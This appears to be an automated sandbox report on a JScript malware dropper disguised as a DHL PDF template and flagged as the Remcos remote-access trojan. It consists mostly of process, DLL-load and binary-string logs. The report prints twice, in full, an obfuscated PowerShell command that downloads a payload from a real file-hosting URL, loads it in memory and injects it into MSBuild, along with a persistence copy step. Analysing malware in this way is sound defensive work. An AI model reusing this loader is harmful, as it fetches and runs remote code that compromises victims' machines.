          Source: Process Memory Space: MSBuild.exe PID: 5600, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winJS@10/6@5/5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 8_2_00415C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle, 8_2_0040E2E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource, 8_2_00419493
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 8_2_00418A00
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\FsssIAil[1].txt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Mutant created: \Sessions\1\BaseNamedObjects\gig-G7MMFK
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5312:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2276:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jswxq4qq.jz0.ps1
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: DHL RPA GRBP Template.PDF.js | ReversingLabs: Detection: 37%
Source: DHL RPA GRBP Template.PDF.js | Virustotal: Detection: 37%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL RPA GRBP Template.PDF.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\marly.js"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe C:\ProgramData\marly.js
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\marly.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.resourcesuserresourcedatadnlib.dotnetassemblyrefuserdnlib.dotnetresolveexceptiondnlib.dotnet.emitmethodbodyreaderdnlib.dotnet.resourcesresourcewritermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnet.pdbsymbolreadercreatordnlib.peimagesectionheaderdnlib.dotnet.emitlocallistdnlib.dotnet.writermdtablewriterdnlib.dotnetimdtokenproviderdnlib.dotnet.emitmethodbodyreaderbasednlib.dotnetmethodequalitycomparerdnlib.dotnetmdtokendnlib.dotnettypenameparserdnlib.dotnet.writeriheap source: powershell.exe, 00000002.00000002.2512100355.00007FF848950000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2512100355.00007FF848950000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: `1dnlib.dotnet.mdstreamheaderdnlib.dotnet.mdtableinfodnlib.dotnetmarshalblobreaderdnlib.dotnetitypeormethoddefmicrosoft.win32.taskschedulermonthlydowtriggerdnlib.dotnet.pdbpdbwritermicrosoft.win32.taskschedulertasksettingsmicrosoft.win32.taskschedulertaskserviceversiondnlib.dotneticodedtokendnlib.dotnet.mdrawencmaprowdnlib.dotnet.writeriwritererrordnlib.dotnetimanagedentrypointdnlib.dotnetassemblylinkedresourcednlib.dotnetcablobparserexceptiondnlib.dotnetassemblyattributesdnlib.dotnet.writeritokencreatordnlib.dotnetassemblyresolveexceptiondnlib.dotnetclassorvaluetypesigdnlib.dotnetmethodsigdnlib.dotnetcmodoptsigdnlib.dotnetimplmapmicrosoft.win32.taskschedulertasktriggertypemicrosoft.win32.taskschedulertaskrightsmicrosoft.win32.taskschedulermonthsoftheyeardnlib.pedllcharacteristicsdnlib.dotnetparamattributesdnlib.dotnet.mdicolumnreadersystem.security.accesscontrolaccesscontrolextensionmicrosoft.win32.taskschedulertaskprincipalprivilegesmicrosoft.win32.taskscheduleridletriggermicrosoft.win32.taskscheduler.fluentweeklytriggerbuilderdnlib.dotnetimplmapuserdnlib.dotnet.writerdummymodulewriterlistenermicrosoft.win32.taskschedulerquicktriggertype source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: `1microsoft.win32.taskscheduleritaskhandlerstatusdnlib.dotnet.writerchunklistbase`1dnlib.iohomednlib.dotneticustomattributednlib.dotnet.pdb.dssisymunmanagedwriter2dnlib.dotnet.writermaxstackcalculatordnlib.dotnet.pdbpdbdocumentusersmicrosoft.win32.taskscheduler.fluentmonthlytriggerbuilderdnlib.dotnet.writerhotpooldnlib.dotneteventattributesdnlib.dotnet.pdb.dsssymbolreadercreatordnlib.dotnet.writermodulewriterbasemicrosoft.win32.taskschedulerpowershellactionplatformoptiondnlib.dotnet.writerioffsetheap`1dnlib.dotnetclasslayoutuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetinterfacemarshaltypemicrosoft.win32.taskschedulertaskeventlogdnlib.dotnetmarshaltypemicrosoft.win32.taskschedulertaskfolderdnlib.dotnet.resourcesresourcereaderexceptionmicrosoft.win32.taskscheduleractioncollectiondnlib.ioioextensionsdnlib.dotnet.writerchunklist`1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.mddotnetstreamdnlib.dotnetfieldattributesdnlib.dotnetparamdefdnlib.dotnetimemberrefresolverdnlib.dotnet.writerpeheadersdnlib.dotnet.writerwin32resourceschunkmicrosoft.win32.taskschedulernotv1supportedexceptioncronfieldtypednlib.dotnet.writermethodbodychunksdnlib.dotnetcaargumentmicrosoft.win32.taskscheduleritriggeruseriddnlib.dotnetloggereventdnlib.utilsmfunc`3dnlib.dotnetsecurityactiondnlib.dotnet.pdb.dsssymbolwritercreatordnlib.ioibinaryreadermicrosoft.win32.taskschedulersessionstatechangetriggerdnlib.dotnetassemblydefdnlib.dotneticustomattributetypednlib.